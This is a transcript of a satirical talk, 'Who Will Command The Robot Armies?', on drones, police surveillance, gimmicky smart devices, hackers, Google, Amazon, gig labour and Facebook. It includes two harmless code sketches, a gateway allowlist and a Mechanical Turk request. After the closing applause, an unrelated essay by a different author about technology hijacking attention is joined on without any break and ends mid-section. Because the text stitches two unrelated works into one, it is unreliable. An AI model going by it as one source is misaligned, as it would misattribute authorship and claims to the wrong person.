Who Will Command The Robot Armies?
When John Allsopp invited me here, I told him how excited I was to discuss a topic that's been heavy on my mind: accountability in automated systems.
But then John explained that in order for the economics to work, and for it to make sense to fly me to Australia, there needed to actually be an audience.
So today I present to you my exciting new talk:
Who Will Command the Robot Armies?
The Military
Let's start with the most obvious answer—the military.
This is the Predator, the forerunner of today's aerial drones. Those things under its wing are Hellfire missiles.
These two weapons are the chocolate and peanut butter of robot warfare. In 2001, CIA agents got tired of looking at Osama Bin Laden through the camera of a surveillance drone, and figured out they could strap some missiles to the thing. And now we can't build these things fast enough.
We're now several generations into this technology, and soldiers have smaller, portable UAVs they can throw like a paper airplane. You launch them in the field, and they buzz around and give you a safe way to do reconnaissance.
There are also portable UAVs with explosives in their nose, so you can fire them out of a tube and then direct them against a target—a group of soldiers, an orphanage, or a bunker—and make them perform a kamikaze attack.
The Army has been developing unmanned vehicles that work on land, little tanks that roll around with a gun on top, with a wire attached for control, like the cheap remote-controlled toys you used to get at Christmas.
Here you see a demo of a valiant robot dragging a wounded soldier to safety.
The Russians have their own versions of these things, of course. Here's a cute little mini-tank that patrols the perimeter of a defense installation.
I imagine it asking you who you are in a heavy Slavic accent before firing its many weapons into your fleeing body.
Not all these robots are intended as weapons. The Army is trying to automate transportation, sometimes in weird-looking ways like this robotic dog monster.
DARPA funded research into this little bit of nightmare fuel, a kind of headless horse, that can cover rough terrain and carry gear on its back.
So progress with autonomous and automated systems in the military is rapid.
The obvious question as these systems improve is whether there will ever be a moment when machines are allowed to decide to kill people without human intervention.
I think there's a helpful analogy here with the Space Shuttle.
The Space Shuttle was an almost entirely automated spacecraft. The only thing on it that was not automated was the button that dropped the landing gear. The system was engineered that way on purpose, so that the Shuttle had to have a crew.
The spacecraft could perform almost an entire mission solo, but it would not be able to put its wheels down.
When the Russians built their shuttle clone, they removed this human point of control. The only flight the Buran ever made was done on autopilot, with no people aboard.
I think we'll see a similar evolution in autonomous weapons. They will evolve to a point to where they are fully capable of finding and killing their targets, but the designers will keep a single point of control.
And then someone will remove that point of control.
Last week I had a whole elaborate argument about how that could happen under a Clinton Administration. But today I don't need it.
It's important to talk about the political dynamic driving the development of military robots.
In the United States, we've just entered the sixteenth year of a state of emergency. It has been renewed annually since 2001.
It has become common political rhetoric in America to say that 'we're at war', even though being 'at war' means something vastly different for Americans than, say, Syrians.
(Instead of showing you pictures of war, I'm going to show pictures of kids I met in Yemen in 2014. These are the people our policies affect most.)
The goal of military automation is to make American soldiers less vulnerable. This laudable goal also serves a cynical purpose.
Wounded veterans are a valuable commodity in American politics, but we can't produce them in large numbers without facing a backlash.
Letting robots do more of the fighting makes it possible to engage in low-level wars for decades at a time, without creating political pressure for peace.
As it becomes harder to inflict casualties on Western armies, their opponents turn to local civilian targets. These are the real victims of terrorism: people who rarely make the news but suffer immensely from the state of permanent warfare.
Once in a long while, a terror group is able to successfully mount an attack in the West. When this happens, we panic.
The inevitable hardening of our policy fuels a dynamic of grievance and revenge that keeps the cycle going.
While I don't think anyone in the Army is cynical enough to say it, there are institutional incentives to permanent warfare.
An army that can practice is much better than one that can only train. Its leaders, tactics, and technologies are tested under real field conditions. And in 'wartime', cutting military budgets becomes politically impossible.
These remote, imbalanced wars also allow us to experiment with surveillance and automation technologies that would never pass ethical muster back home.
And as we'll see, a lot of them make it back home anyway.
It's worth remarking how odd it is to have a North American superpower policing remote areas of Pakistan or Yemen with flying robots.
Imagine if Indonesia were flying drones over northern Australia, to monitor whether anyone there was saying bad things about Muslims.
Half of Queensland would be in flames, and everyone in this room would be on a warship about to land in Jakarta.
The Police
My second contender for who will command the robot armies is the police.
Technologies that we develop to fight our distant wars get brought back, or leak back, into civilian life back home.
The most visible domestic effect of America's foreign wars has been the quantity of military surplus equipment that ends up being given to police.
Local police departments around the country (and here in Australia) have armored vehicles, military rifles, night vision goggles and other advanced equipment.
After the Dallas police massacre, the shooter was finally killed by a remotely controlled bomb disposal robot initially designed for use by the military in Iraq.
I remember how surprising it was after the Boston marathon bombings to see the Boston police emerge dressed like the bad guys from a low-budget sci-fi thriller. They went full Rambo, showing up with armored personnel carriers and tanks.
Still, cops will be cops. Though they shut down all of downtown Boston, the police did make sure the donut shops stayed open.
The militarization of our police extends to their behavior, and the way they interact with their fellow citizens.
Many of our police officers are veterans. Their experience in foreign wars colors the attitudes and tactics they adopt back home.
Less visible, but just as important, are the surveillance technologies that make it back into civilian life.
These include drones with gigapixel cameras that can conduct surveillance over entire cities, and whose software can follow dozens of vehicles and pedestrians automatically.
The United States Border Patrol has become an enthusiastic (albeit not very effective) adopter of unmanned aerial vehicles.
These are also being used here in Australia, along with unmanned marine vehicles, to intercept refugees arriving by sea.
Another gift of the Iraq war is the Stingray, a fake base station that hijacks cell phone traffic, and is now being used rather furtively by police departments across the United States.
When we talk about government surveillance, there's a tendency to fixate on national agencies like the NSA or CIA. These are big, capable bureaucracies, and they certainly do a lot of spying.
But these agencies have an internal culture of following rules (even when the rules are secret) and an institutional commitment to a certain kind of legality. They're staffed by career professionals.
None of these protections apply when you're dealing with local law enforcement. I trust the NSA and CIA to not overstep their authority much more than I trust some deputy sheriff in East Dillweed, Arizona.
Unfortunately, local police are getting access to some very advanced technology.
So for example San Diego cops are swabbing people for DNA without their consent, and taking photos for use in a massive face recognition database. Half the American population now has their face in such a database.
And the FBI is working on a powerful 'next-generation' identification system that will be broadly available to other government agencies, with minimal controls.
The Internet of Things
But this talk is getting grim! Let's remember that not all robots are out to kill us, or monitor us.
There are all kinds of robots that simply want to help us and live with us in our homes, and make us happy.
Let's talk about those friendly robots for a while.
Consider the Juicebro! The Juicebro is a $700 Internet-connected juice smasher that sits on your countertop.
Juicebro makes juice from $7 packets of pre-chopped vegetables with a QR code on the back. If the Internet connection is down, or the QR code does not validate, Juicebro will refuse to make you juice. Juicebro won't take that risk!
Flatev makes sad little tortillas from a Keurig-like capsule of dough, and puts them in a drawer. Each dough packet costs $1.
The Vessyl is a revolutionary smart cup that tells you what you're drinking.
Here, for example, the Vessyl has sensed that you are drinking a beer.
(This feature can probably be hard-coded in Australia.)
Because of engineering difficulties, the Vessyl is not quite ready for sale. Instead, its makers are selling the Pryme, a $99 smart cup that can only detect water.
You'll know right to the milliliter how much water you're drinking.
The Kuvée is the $200 smart wine bottle with a touchscreen that tells you right on the bottle what the wine tastes like.
My favorite thing about the Kuvée is that if you don't charge it, it can't pour the wine.
The Wilson X connected football detects "velocity, distance, spiral efficiency, spin rate and whether a pass was caught or dropped." It remembers these statistics forever.
No more guesswork with the Wilson connected football!
The Molekule is one of my favorite devices, a human-portable air freshener that "breaks down pollutants on a molecular level".
At only eight kilos, it can be lugged around comfortably as you pad barefoot from room to room.
Molekule makes sure you never breathe a single molecule of un-purified air.
Here is the Internet connected kettle! There was a fun bit of drama with this just a couple of weeks ago, when the data scientist Mark Rittman spent eleven hours trying to connect it to his automated home.
The kettle initially grabbed an IP address and tried to hide:
3 hrs later and still no tea. Mandatory recalibration caused wifi base station reset, now port-scanning network to find where kettle is now.
Then there was a postmodern moment when the attention Rittman's ordeal was getting on Twitter started causing his home system to go haywire:
Now the Hadoop cluster in the garage is going nuts due to RT to @internetofshit, saturating network + blocking MQTT integration with Amazon Echo
Finally, after 11 hours, Rittman was able to get everything working and posted this triumphal tweet:
Well the kettle is back online and responding to voice control, but now we're eating dinner in the dark while the lights download a firmware update.
Internet connected kettle, everybody!
Peggy is the web-connected clothespin with a humidity sensor that messages you when your clothes are dry.
I'm not sure if you're supposed to buy a couple dozen of these, or if you're meant to use only one, and dry items one after the other.
This smart mirror couples with a smart scale to help you start your morning right.
Step on the scale, look in the mirror, and find out how much more you weigh, and if you have any new wrinkles.
Flosstime is the world's first and possibly last smart floss dispenser. It blinks at you accusingly when it is time to floss, and provocatively spits out a thread of floss for you to grab.
I especially like the user design for when there are two people using this device. You're supposed to take it off its mounting, flip a switch on its back to user #2, and then back away slowly so the motion detector doesn't register your presence.
Spire is a little stone that you clip to your belt that reminds you to breathe.
Are you sick and tired of waiting twelve minutes for cookies?
The CHiP smart oven will make you a batch of cookies in under ten minutes!
The my.Flow is a smart tampon. The sensor connects with a cord to a monitor that you wear clipped to the outside of your belt, and messages you when it's time to change your tampon.
Nothing gives you peace of mind like connecting something inside your body to the outside of your clothing.
Here is Huggies TweetPee, which is exactly what you're most afraid it will be.
This moisture sensor clips to your baby's diaper and sends you a tweet when it is wet.
Huggies tried to make a similar sensor to detect when the diaper is full of shit, but it proved impossible to distinguish from normal activity on Twitter.
Finally, meet Kisha, the umbrella that tells you when it's raining.
All of these devices taken together make for quite a smart home. Every one of them comes with an app, and none of them seem to consider the cumulative effect of so many notifications and apps on people's sanity.
They are like little birds clamoring to be fed, oblivious to everything else.
The people who design these devices don't think about how they are supposed to peacefully coexist in a world full of other smart objects.
This raises the question of who will step up and figure out how to make the Internet of Things work together as a cohesive whole.
Evil Hackers
Of course, the answer is hackers!
Before we talk about them, let's enjoy this stock photo.
I've been programming for a number of years, but I've still never been in a situation where green binary code is being projected onto my hoodie. Yet this seems to happen all the time when you're breaking into computer systems.
Notice also how poor this guy's ergonomics are. That hood is nowhere near parallel to the laptop screen.
This poor hacker has it even worse!
He doesn't even have a standing desk, so he's forced to hold the laptop up with one hand, like a waiter.
But despite these obstacles, hackers are able to reliably break into all kinds of IoT devices.
And since these devices all need access to the Internet, so they can harass your phone, they are impossible to secure.
This map could stand for so many things right now.
But before the election it was just a map of denial-of-service attacks against a major DNS provider, that knocked a lot of big-name sites offline in the United States.
This particular botnet used webcams with hard-coded passwords. But there is no shortage of vulnerable devices to choose from.
In August, researchers published a remote attack against a smart lightbulb protocol. For some reason, smart lightbulbs need to talk to each other.
“Hey, are you on?”
“Yeah, I'm on.”
“Wanna blink?”
“Sure!”
In their proof of concept, the authors were able to infect smart light bulbs in a chain reaction, using a drive-by car or a drone for the initial hack.
The bulbs can be permanently disabled, or made to put out a loud radio signal that will disrupt wifi anywhere nearby.
Since these devices can't be trusted to talk to the Internet by themselves, one solution is to have a master device that polices net access for all the others, a kind of robot butler to keep an eye on the staff.
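To make the idea concrete, here is a toy sketch of the kind of allowlist such a gatekeeper might enforce. The device names and hostnames are invented for illustration; this is not any real gateway's firmware.

```python
# Toy sketch of the "robot butler" idea: a home gateway that only lets
# each device talk to an explicit allowlist of hosts.
# Device names and hostnames below are invented for illustration.

ALLOWLIST = {
    "kettle":    {"firmware.example-kettle.com"},
    "lightbulb": {"hub.example-bulbs.com"},
    "webcam":    set(),  # no Internet access at all
}

def permit(device: str, destination: str) -> bool:
    """Forward traffic only if the device is known and the host is allowed."""
    return destination in ALLOWLIST.get(device, set())

print(permit("kettle", "firmware.example-kettle.com"))   # True
print(permit("webcam", "command-and-control.example"))   # False
```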
Google recently introduced Google Home, which looks like an Orwellian air freshener. It sits in your house, listens through always-on microphones, and plays reassuring music through speakers in its base.
So maybe it's Google who will command the robot armies! They have the security expertise to build such a device and the programming ability to make it useful.
Yet Google already controls our online life to a troubling degree. Here is a company that runs your search engine and web browser, and manages your email, your DNS, your phone's operating system, and now your phone itself.
Moreover, Doubleclick and Google Analytics tell Google about your activity across every inch of the web.
Now this company wants to put an always-on connected microphone in every room of your home.
What could go wrong?
For examples of failure, always turn to Yahoo.
On the same day that Google announced Google Home, Reuters revealed that Yahoo had secretly installed software in 2014 to search through all incoming email at the request of the US government.
What was especially alarming was the news that Yahoo had done this behind the backs of its own security team.
This tells us that whatever safeguards Google puts in its always-on home microphone will not protect us from abuses by government, even if everyone at Google security were prepared to resign in protest.
And that's a real problem.
Over the last two decades, the government's ability to spy on its citizens has grown immeasurably.
Mostly this is due to technology transfer from the commercial Internet, whose economic model is mass surveillance. Techniques and software that work in the marketplace are quickly adopted by intelligence agencies worldwide.
President Obama has been fairly sparing in his use of this power. I say this not to praise him, but actually to condemn him. His relative restraint, and his administration's obsession with secrecy, have masked the full extent of power that is available to the executive branch.
Now that power is being passed on to a new President, and we are going to learn all about what it can do.
Amazon
So Google is out! The company knows too much, and it's too easy for the information it collects to fall into tiny, orange hands.
Maybe Amazon can command the robot armies? They sell a similar device to Google Home, a pretty cylinder called Echo that listens to voice commands. Unlike Home, it's already widely available.
And our relationship with Amazon is straightforward compared to Google. Amazon just wants to sell us shit. There's none of Google's obliqueness, creepy advertising, or mysterious secret projects designed to save the world.
Amazon Echo is a popular device, especially with parents who like being able to do things with voice commands.
And recently they've added little hockey pucks that you're supposed to put around your house, so that there's microphone coverage everywhere.
Amazon knows all about robot armies. For starters, they run the cloud, one of the biggest automated systems in the world.
And they have ambitious ideas about how robots could serve us in the future.
Amazon's vision of how we'll automate our lives is delightfully loopy. Consider the buttons they sell that let you re-order any product.
I lifted this image right from their website. When would this scenario ever be useful? Is this a long weekend after some bad curry? How much time are we talking about here?
And what do you do when the doorbell rings?
It's too bad, then, that Amazon has Trump problems of its own.
Here's a tweet from Jeff Bezos—the man who controls "the Cloud" and the Washington Post—two days after the election.
Congratulations to @realDonaldTrump. I for one give him my most open mind and wish him great success in his service to the country.
People are opening their minds so far their brains are falling out.
I'd like to talk about a different kind of robot army that Amazon commands.
Most of you know that the word "robot" comes from a 1920 play by Karel Čapek.
I finally read this play and was surprised to learn that the robots in it were not mechanical beings. They were made of flesh and bone, just like people, except that they were assembled instead of being born.
Čapek's robots resemble human beings but don't feel pain or fear, and focus only on their jobs.
In other words, they're the ideal employee.
Amazon has been trying to achieve this perfect robotic workforce for years. Many of the people who work in its warehouses are seasonal hires, who don't get even the limited benefits and job security of the regular warehouse staff.
Amazon hires such workers through a subsidiary called Integrity. If you know anything about American business culture, you'll know that a company called "Integrity" can only be pure evil.
Working indirectly for Amazon like this is an exercise in precariousness. Integrity employees don't know from day to day whether they still have a job. Sometimes their key card is simply turned off.
A lot of what we consider high-tech startups work by repackaging low-wage labor.
Take Blue Apron, one of a thousand "box of raw food" startups that have popped up in recent years. Blue Apron lets you cook a meal without having to decide on a recipe or shop for ingredients. It's kind of like a sous-chef simulator.
Blue Apron relies on a poorly-trained, low wage workforce to assemble and deliver these boxes. They've had repeated problems with workplace violence and safety at their Richmond facility.
It's odd that this human labor is so invisible.
Wealthy consumers in the West have become enamored with "artisanal" products. We love to hear how our organic pork is raised, or what hopes and dreams live inside the heart of the baker who shapes our rustic loaves.
But we're not as interested in finding out who assembled our laptop.
In fact, a big selling point of online services is not having to deal with other human beings. We never engage with the pickers in an Amazon warehouse who assemble our magical delivery. And I will never learn who is chopping vegetables for my Juicebro packet.
So is labor something laudable or not?
Our software systems treat labor as a completely fungible commodity, and workers as interchangeable cogs. We try to put a nice spin on this frightening view of labor by calling it the "gig economy".
The gig economy disguises precariousness as empowerment. You can pick your own hours, work only as much as you want, and set your own schedule.
For professionals, that kind of freedom is attractive. For people in low-wage jobs, it's a disaster. A job has predictable hours, predictable pay, and confers stability and social standing.
The gig economy takes all that away. You work whatever hours are available, with no guarantee that there will be more work tomorrow.
I do give Amazon credit for one thing: their white-collar employees are just as miserable as their factory staff. They don't discriminate.
As we automate more of middle management, we are moving towards a world of scriptable people—human beings whose labor is controlled by an algorithm or API.
Amazon has gone further than anyone else in this direction with Mechanical Turk.
Mechanical Turk is named after an 18th-century device that purported to be a chess-playing automaton. In reality, it had a secret compartment where a human player could squeeze himself in unseen.
So the service is literally named after a box that people squeezed themselves into to pretend to be a machine. And it has that troubling, Orientalist angle to boot.
A fascinating thing about Mechanical Turk is how heavily it's used for social science research, including research into low-wage labor.
Social scientists love having access to a broad set of survey-takers, but don't think about the implications (or ethics) of using these scriptable people, who spend their entire workday filling out similar surveys.
A lot of our social science is being conducted by having these people we treat like robots fill out surveys.
My favorite Internet of Things device is a fan called the Ethical Turk that subverts this whole idea of scriptable people.
This clever fan (by the brilliant Simone Rebaudengo) recognizes moral dilemmas and submits them to a human being for adjudication. Conscious of the limits of robotkind, it asks people for ethical help.
For example, if the fan detects that there are two people in front of it, it won't know which one to cool. So it uploads a photograph of the situation to Mechanical Turk, which assigns the task to a human being. The human makes the ethical decision and returns an answer along with a justification. The robot obeys the answer, and displays the justification on a little LCD screen.
The fan has dials on the side that let you select the religion and educational level of the person making the ethical choice.
My favorite thing about this project is how well it subverts Amazon's mechanization of labor by using human beings for the one thing that makes them truly human. People become a kind of ethics co-processor.
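For the curious, the plumbing for something like this can be quite small. Here is a rough sketch of how a device might post such a dilemma to Mechanical Turk, assuming Amazon's boto3 client. The question text, reward, and polling loop are my own invention, not the artist's code.

```python
# Sketch only: how a device like the Ethical Turk fan might hand a
# dilemma to a human via Amazon Mechanical Turk.
import time
import boto3

mturk = boto3.client("mturk", region_name="us-east-1")

# A free-text question for the human "ethics co-processor" (illustrative).
QUESTION_XML = """
<QuestionForm xmlns="http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2005-10-01/QuestionForm.xsd">
  <Question>
    <QuestionIdentifier>who_to_cool</QuestionIdentifier>
    <QuestionContent><Text>Two people are in front of the fan. Who should it cool, and why?</Text></QuestionContent>
    <AnswerSpecification><FreeTextAnswer/></AnswerSpecification>
  </Question>
</QuestionForm>
"""

hit = mturk.create_hit(
    Title="Settle an ethical dilemma for a household fan",
    Description="Pick who the fan should cool and give a one-line justification.",
    Reward="0.05",
    MaxAssignments=1,
    LifetimeInSeconds=600,
    AssignmentDurationInSeconds=120,
    Question=QUESTION_XML,
)

# Poll until a human has answered, then act on the verdict.
while True:
    result = mturk.list_assignments_for_hit(
        HITId=hit["HIT"]["HITId"], AssignmentStatuses=["Submitted"]
    )
    if result["Assignments"]:
        print("Human verdict:", result["Assignments"][0]["Answer"])
        break
    time.sleep(10)
```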
The Robot Within
Let me talk briefly about the robots inside us.
We all aspire to live in the moment like Zen masters. I know that right now I'm completely immersed in this talk, and you feel equally alive and alert, fully engaged in what I'm saying. We're fellow passengers on a high-speed train of thought headed to God knows where.
But it's also true that we spend much of our lives on autopilot. We have our daily routine, our habits, and there are many tasks that we perform with less than our full attention.
In those situations, we can find ourselves behaving a bit like robots.
All of modern advertising is devoted to catching us in those moments of weakness. And automation and tracking has opened up new frontiers in how advertisers can try to manipulate our behavior.
Cathy Carleton is a marketing executive who flies a lot on US Airways. At some point, she noticed that she was consistently being put in the last boarding group. Boarding last means not having enough room for your bag, so it's one of those petty annoyances that compounds when you travel a lot.
After some months of being last to board every plane, she realized that the airline was pushing her to get the US Airways credit card, one of whose perks is that you get to board in an early group.
This kind of triple bank shot of tracking, advertising and behavior modification was never possible in the past, but now it's a routine part of our lives.
I have a particular fascination with chatbots, the weird next stage in corporate personhood. The defining feature of the chatbot is its insincerity. Both you and the chatbot (or the low-wage worker pretending to be the chatbot) know that you're talking to a fictitious persona, but you have the conversation anyway.
By pretending to be people, chatbots seek access to a level of emotional engagement that we normally only offer to human beings.
And if we're not paying attention, we give it to them.
So it's fun to watch them fail in inhuman ways.
A few weeks ago I was riffing with people on Twitter about what kinds of devices we'd find in Computer Hell. At some point I suggested that Computer Hell would be served by America's most hated cable company:
Computer Hell is proudly served by Comcast
Seconds later, the Comcast bot posted a reply:
@pinboard Good afternoon. I'd be happy to look into any connection problems you're having...
The same thing happened after I tweeted about Google:
Sobering to think that the ad-funded company running your phone, DNS, browser, search engine and email might not cherish your privacy.
Google Home looks pretty great though.
The chatbot only noticed my second tweet, and thanked me fulsomely for my interest. (Unfortunately that reply has been taken down. Either the Google bot got smarter, or an intern was made to vet all conversations for irony).
While these examples are fun, the chatbot experience really isn't. It's companies trying to hijack our sociability with computer software, in order to manipulate us more effectively. And as the software gets better, these interactions will start to take a social and cognitive toll.
Social Media
Sometimes you don't even notice when you're acting like a robot.
This is a picture of my cat, Holly.
My roommate once called me over all excited to show me that he'd taught Holly to fetch.
I watched her walk up to him with a toy in her mouth and drop it at his feet. He picked it up and threw it, and she ran and brought it back several times until she had had enough.
He beamed at me. "She does this a couple of times a day."
He was about to go back to whatever complicated coding task the cat had interrupted, but something about the situation felt strange. We thought for a moment, our combined human brains trying to work out the implications.
My roommate hadn't trained the cat to do anything.
She had trained him to be her cat toy.
I think of this whenever I read about Facebook. Facebook tells us that by liking and sharing stuff on social media, we can train their algorithm to better understand what we find relevant, and improve it for ourselves and everyone else.
Here, for example, is a screenshot from a live feed of the war in Syria. People are reacting to it on Facebook as they watch, and their reaction emoji scroll from right to left. It's unsettling.
What Facebook is really doing is training us to click more. Every click means money, so the site shows us whatever it has to show to maximize those clicks.
The result can be tragic. With no ethical brake on the game, and no penalty for disinformation, outright lies and hatred can spread unchecked. Whatever Facebook needs to put on your screen for you to click is what you will see.
In the recent US election, Facebook was the primary news source for 44% of people, over half of whom used it as their only news source.
Voters in our last election who had a 'red state' profile saw absolutely outrageous stories on their newsfeed. There was a cottage industry in Macedonia writing fake stories that would get boosted by Facebook's algorithm. There were no consequences to this, other than electing an orange monster.
But Facebook insists it's a tech company, not a media company.
Chad and Brad
My final nominees for commanders of the robot armies are Chad and Brad.
Chad and Brad are not specific people. They're my mental shorthand for developers who are just trying to crush out some code on deadline, and don't think about the wider consequences of their actions.
The principle of charity says that we should assume Chad and Brad are not trying to fuck up intentionally, or in such awful ways.
Consider Pokémon Go, which when it was initially released required full access to your Gmail account. To play America's most popular game, you practically had to give it power of attorney.
And the first action Pokémon Go had you take was to photograph the inside of your house.
You might think this was a brilliant conspiracy to seize control of millions of Gmail accounts, or harvest a trove of private photographs.
But it was only Chad and Brad, not thinking things through.
ProPublica recently discovered that you could target housing and employment ads on Facebook based on 'ethnic affinity', a proxy for race.
It's hard to express how illegal this is in the United States. The entire civil rights movement happened to outlaw this kind of discrimination.
My theory is that every Facebook lawyer who saw this interface had a fatal heart attack. And when no one registered any objection, Chad and Brad shipped it.
Here's an example from Andy Freeland of Uber's flat-fare zone in Los Angeles.
You can see that the boundary of this zone follows racial divisions. If you live in a black part of LA, you're out of luck with Uber. Whoever designed this feature probably just sorted by ZIP code and picked a contiguous area above an income threshold. But the results are discriminatory.
What makes Chad and Brad a potent force is that you rarely see their thoughtlessness so clearly. People are alert to racial discrimination, so sometimes we catch it. But there's a lot more we don't catch, and modern machine learning techniques make it hard to audit systems for carelessness or compliance.
Here is a similar map of Uber's flat-fare zone in Chicago. If you know the city, you'll notice it's got an odd shape, and excludes the predominantly black south side of the city, south of the diagonal line. I've shown the actual Chicago city limits on the right, so you can compare.
Or consider this screenshot from Facebook, taken last night. Facebook added a nice little feature that says 'you have new elected representatives, click here to find out who they are!'
When you do, it asks you for your street address. So to find out that Trump got elected, I have to give a service that knows everything about me except my address (and who has a future member of Trump's cabinet on its board) the one piece of information that it lacks.
This is just the kind of sloppy coding we see every day, but it plays out at really high stakes.
The Chads and Brads of this world control algorithms that decide if you get a loan, if you're more likely to be on a watch list, and what kind of news you see.
For more on this topic, I highly recommend Cathy O'Neil's new book, Weapons of Math Destruction.
Conclusion
So who will command the robot armies?
Is it the army? The police?
Nefarious hackers? Google, or Amazon?
Some tired coder who just can't be bothered?
Facebook, or Twitter?
Brands?
I wanted to end this talk on a note of hope. I wanted to say that ultimately who commands the robot armies will be up to us.
That it will be some version of "we the people" that takes these tools and uses them with the care they require.
But it just isn't true.
The real answer to who will command the robot armies is: Whoever wants it the most.
And right now we don't want it. Because taking command would mean taking responsibility.
Facebook says it's not their fault what people share on the site, even if it's completely fabricated, and helps decide an election.
Twitter says there's nothing they can do about vicious racists using the site as a political weapon. Their hands are tied!
Uber says they can't fight market forces or regulate people's right to drive for below minimum wage.
Amazon says they can't pay their employees a living wage because they aren't even technically employees.
And everyone agrees that the answer to these problems is not regulation, but new and better technologies, and more automation.
Nobody wants the responsibility; everybody wants the control.
Instead of accountability, all we can think of is the next wave of technology that will make everything better. Rockets, robots, and self-driving cars.
We innovated ourselves into this mess, and we'll innovate our way out of it.
Eventually, our technology will get so advanced that we can build sentient machines, and they will help us create (somehow) a model society.
Getting there is just a question of being sufficiently clever.
On my way to this conference from Europe, I stopped in Dubai and Singapore to break the journey up a little bit.
I didn't think about the symbolism of these places, or how they related to this talk.
But as I walked around, the symbolism of both places was hard to ignore.
Dubai, of course, is a brand new city that has grown up in an empty desert. It's like a Las Vegas without any fun, but with much better Indian food.
In Dubai, the gig economy has been taken to its logical conclusion. Labor is fungible, anonymous, and politically inert. Workers serve at the whim of the employer, and are sent back to their home countries when they're not wanted.
There are different castes of foreign workers—western expats lead a fairly cozy life, while South Indian laborers and Filipino nannies have it rough.
But no matter what you do, you can never hope to be a citizen.
Across all the Gulf states there is a permanent underclass of indentured laborers with no effective legal rights. It's the closest thing the developed world has to slavery.
Singapore, where I made my second stop, is a different kind of animal.
Unlike Dubai, Singapore is an integrated multi-ethnic society where prosperity is widely shared, and corruption is practically nonexistent.
It may be the tastiest police state in the world.
On arrival there, you get a little card telling you you'll be killed for drug smuggling. Curiously, they only give it to you once you're already over the border.
But the point is made. Don't mess with Singapore.
Singaporeans have traded a great deal of their political and social freedom for safety and prosperity. The country is one of the most invasive surveillance states in the world, and it's also a clean, prosperous city with a strong social safety net.
The trade-off is one many people seem happy with. While Dubai is morally odious, I feel ambivalent about Singapore. It's a place that makes me question my assumptions about surveillance and social control.
What both these places have in common is that they had some kind of plan. As Walter Sobchak put it, say what you will about social control, at least it's an ethos.
The founders of these cities pursued clear goals and made conscious trade-offs. They used modern technology to work towards those goals, not just out of a love of novelty.
We, on the other hand, didn't plan a thing.
We just built ourselves a powerful apparatus for social control with no sense of purpose or consensus about shared values.
Do we want to be safe? Do we want to be free? Do we want to hear valuable news and offers?
The tech industry slaps this stuff together in the expectation that the social implications will take care of themselves. We move fast and break things.
Today, having built the greatest apparatus for surveillance in history, we're slow to acknowledge that it might present some kind of threat.
We would much rather work on the next wave of technology: a smart home assistant in every home, self-driving cars, and rockets to Mars.
We have goals in the long term: to cure illness, end death, fix climate change, colonize the solar system, create universal prosperity, reinvent cities, and become beings of pure energy.
But we have no plan about how to get there in the medium term, other than “let’s build things and see what happens.”
What we need to do is grow up, and quickly.
Like every kid knows, you have to clean up your old mess before you can play with the new toys. We have made a colossal mess, and don't have much time in which to fix it.
And we owe it to these poor robots! They depend on us, they're trying to serve us, and they're capable of a lot of good. All they require from us is leadership and a willingness to take responsibility. We can't go back to the world we had before we built them.
It's been a horrible week.
I'm sure I speak for the other Americans here when I thank you guys for your hospitality and understanding as we try to come to terms with what just happened.
For the next few years, we're in this together. We'll need all your help to get through it. And I am very grateful for this chance to speak to you.
I hope you will join me for my talk next year: "Who Will Command The Robot Navies".
COMPASSIONATE, AUSTRALIAN APPLAUSE.
I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.
When using technology, we often focus optimistically on all the things it does for us. But I want to show you where it might do the opposite.
Where does technology exploit our minds’ weaknesses?
I learned to think this way when I was a magician. Magicians start by looking for blind spots, edges, vulnerabilities and limits of people’s perception, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano.
That’s me performing sleight of hand magic at my mother’s birthday party
And this is exactly what product designers do to your mind. They play your psychological vulnerabilities (consciously and unconsciously) against you in the race to grab your attention.
I want to show you how they do it.
Hijack #1: If You Control the Menu, You Control the Choices
Western Culture is built around ideals of individual choice and freedom. Millions of us fiercely defend our right to make “free” choices, while we ignore how those choices are manipulated upstream by menus we didn’t choose in the first place.
This is exactly what magicians do. They give people the illusion of free choice while architecting the menu so that they win, no matter what you choose. I can’t emphasize enough how deep this insight is.
When people are given a menu of choices, they rarely ask:
“what’s not on the menu?”
“why am I being given these options and not others?”
“do I know the menu provider’s goals?”
“is this menu empowering for my original need, or are the choices actually a distraction?” (e.g. an overwhelming array of toothpastes)
How empowering is this menu of choices for the need, “I ran out of toothpaste”?
For example, imagine you’re out with friends on a Tuesday night and want to keep the conversation going. You open Yelp to find nearby recommendations and see a list of bars. The group turns into a huddle of faces staring down at their phones comparing bars. They scrutinize the photos of each, comparing cocktail drinks. Is this menu still relevant to the original desire of the group?
It’s not that bars aren’t a good choice, it’s that Yelp substituted the group’s original question (“where can we go to keep talking?”) with a different question (“what’s a bar with good photos of cocktails?”) all by shaping the menu.
Moreover, the group falls for the illusion that Yelp’s menu represents a complete set of choices for where to go. While looking down at their phones, they don’t see the park across the street with a band playing live music. They miss the pop-up gallery on the other side of the street serving crepes and coffee. Neither of those show up on Yelp’s menu.
Yelp subtly reframes the group’s need “where can we go to keep talking?” in terms of photos of cocktails served.
The more choices technology gives us in nearly every domain of our lives (information, events, places to go, friends, dating, jobs) — the more we assume that our phone is always the most empowering and useful menu to pick from. Is it?
The “most empowering” menu is different than the menu that has the most choices. But when we blindly surrender to the menus we’re given, it’s easy to lose track of the difference:
“Who’s free tonight to hang out?” becomes a menu of most recent people who texted us (who we could ping).
“What’s happening in the world?” becomes a menu of news feed stories.
“Who’s single to go on a date?” becomes a menu of faces to swipe on Tinder (instead of local events with friends, or urban adventures nearby).
“I have to respond to this email.” becomes a menu of keys to type a response (instead of empowering ways to communicate with a person).
All user interfaces are menus. What if your email client gave you empowering choices of ways to respond, instead of “what message do you want to type back?” (Design by Tristan Harris)
When we wake up in the morning and turn our phone over to see a list of notifications — it frames the experience of “waking up in the morning” around a menu of “all the things I’ve missed since yesterday.” (for more examples, see Joe Edelman’s Empowering Design talk)
A list of notifications when we wake up in the morning — how empowering is this menu of choices when we wake up? Does it reflect what we care about? (from Joe Edelman’s Empowering Design Talk)
By shaping the menus we pick from, technology hijacks the way we perceive our choices and replaces them with new ones. But the closer we pay attention to the options we’re given, the more we’ll notice when they don’t actually align with our true needs.
Hijack #2: Put a Slot Machine In a Billion Pockets
If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.
The average person checks their phone 150 times a day. Why do we do this? Are we making 150 conscious choices?
How often do you check your email per day?
